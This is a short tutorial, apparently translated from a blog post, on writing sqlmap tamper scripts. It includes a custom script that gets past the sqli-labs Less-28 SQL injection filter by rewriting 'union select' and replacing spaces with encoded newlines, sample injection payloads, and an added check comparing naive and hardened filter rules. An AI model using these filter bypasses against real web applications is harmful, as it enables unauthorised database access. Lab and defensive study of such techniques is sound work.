0x00
$ python sqlmap.py --list-tampers  # list the built-in tampers
sqlmap ships with a large set of built-in tampers. They cover the common SQL injection filter bypasses for the usual databases, and under the right conditions they let an injection get past a target's defenses.
0x01
--tamper=xxx.py
To use one, simply add the tamper option when running sqlmap.
0x02
Write your own tamper script for the situation at hand: take the filtering behaviour you have worked out by analysis or by fuzzing, then follow the pattern of a built-in tamper and write it yourself.
0x03
First look at how the built-in tamper base64encode.py is written. Once you understand the layout of a built-in tamper, writing your own is just a matter of following the same pattern.

```python
"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import base64

from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING

# Controls the order in which sqlmap applies this tamper relative to others.
__priority__ = PRIORITY.LOW

def dependencies():
    # Hook for checking extra requirements; this tamper needs none.
    pass

def tamper(payload, **kwargs):
    """
    Base64-encodes all characters in a given payload

    >>> tamper("1' AND SLEEP(5)#")
    'MScgQU5EIFNMRUVQKDUpIw=='
    """

    # Leave empty/None payloads untouched; encode everything else as base64.
    return base64.b64encode(payload.encode(UNICODE_ENCODING)) if payload else payload
```
Take sqli-labs/Less-28 as the worked example. In this level the characters /, *, -, #, space and +, together with the pattern union\s+select, are filtered, so the script is written as follows:

```python
"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Bypass sqli-lab/Less-28
    """

    if payload:
        # Insert ALL so the literal "union select" no longer appears, then
        # replace every space with %0a (newline) since spaces are filtered.
        payload = payload.replace('union select', 'union all select').replace(' ', '%0a')

    return payload
```
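To see what the Less-28 tamper above actually changes on the wire, and how a filter should be written so it is not sidestepped by it, here is an added stand-alone check (not part of the original post or of sqlmap). It repeats the tamper's replace() logic without sqlmap's lib.core imports, compares the post's raw union\s+select rule with one that URL-decodes first and allows the optional ALL keyword, and runs both over constructed sample payloads; the payload strings and the function names are assumptions of this example.

```python
import re
from urllib.parse import unquote

# The tamper logic from the post, repeated without sqlmap's lib.core imports
# so it can be exercised stand-alone (same replace() calls as above).
def less28_tamper(payload):
    if payload:
        payload = payload.replace('union select', 'union all select').replace(' ', '%0a')
    return payload

# The rule from the post's filter list that the tamper targets, applied to
# the raw parameter value exactly as it arrives.
NAIVE_RULE = re.compile(r'union\s+select', re.I)

# Hardened rule: match after URL-decoding (so %0a becomes a real newline,
# which \s covers) and accept the optional ALL/DISTINCT keyword.
HARDENED_RULE = re.compile(r'union\s+(?:all\s+|distinct\s+)?select', re.I)

def naive_detects(raw_value):
    return NAIVE_RULE.search(raw_value) is not None

def hardened_detects(raw_value):
    # A single decode pass; a production check would also bound decode depth
    # against double encoding, which this example does not cover.
    return HARDENED_RULE.search(unquote(raw_value)) is not None

def evaluate(payload):
    """Return (tampered_value, naive_hit, hardened_hit) for one payload."""
    tampered = less28_tamper(payload)
    return tampered, naive_detects(tampered), hardened_detects(tampered)

# Constructed sample payloads in the shape sqlmap's UNION technique sends,
# written in lower case to match the literal the tamper's replace() looks for.
SAMPLE_PAYLOADS = [
    "1' union select 1,2,3",
    "1' union select null,null,null",
]

if __name__ == "__main__":
    for p in SAMPLE_PAYLOADS:
        tampered, naive, hardened = evaluate(p)
        print(f"{tampered!r}: naive={naive} hardened={hardened}")
```

Running it shows the tampered value passes the raw-string rule but is still caught once the check decodes the parameter and treats any whitespace as a separator.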
Reference: Web Security Engineer (Advanced) course, NetEase Cloud Classroom (网易云课堂).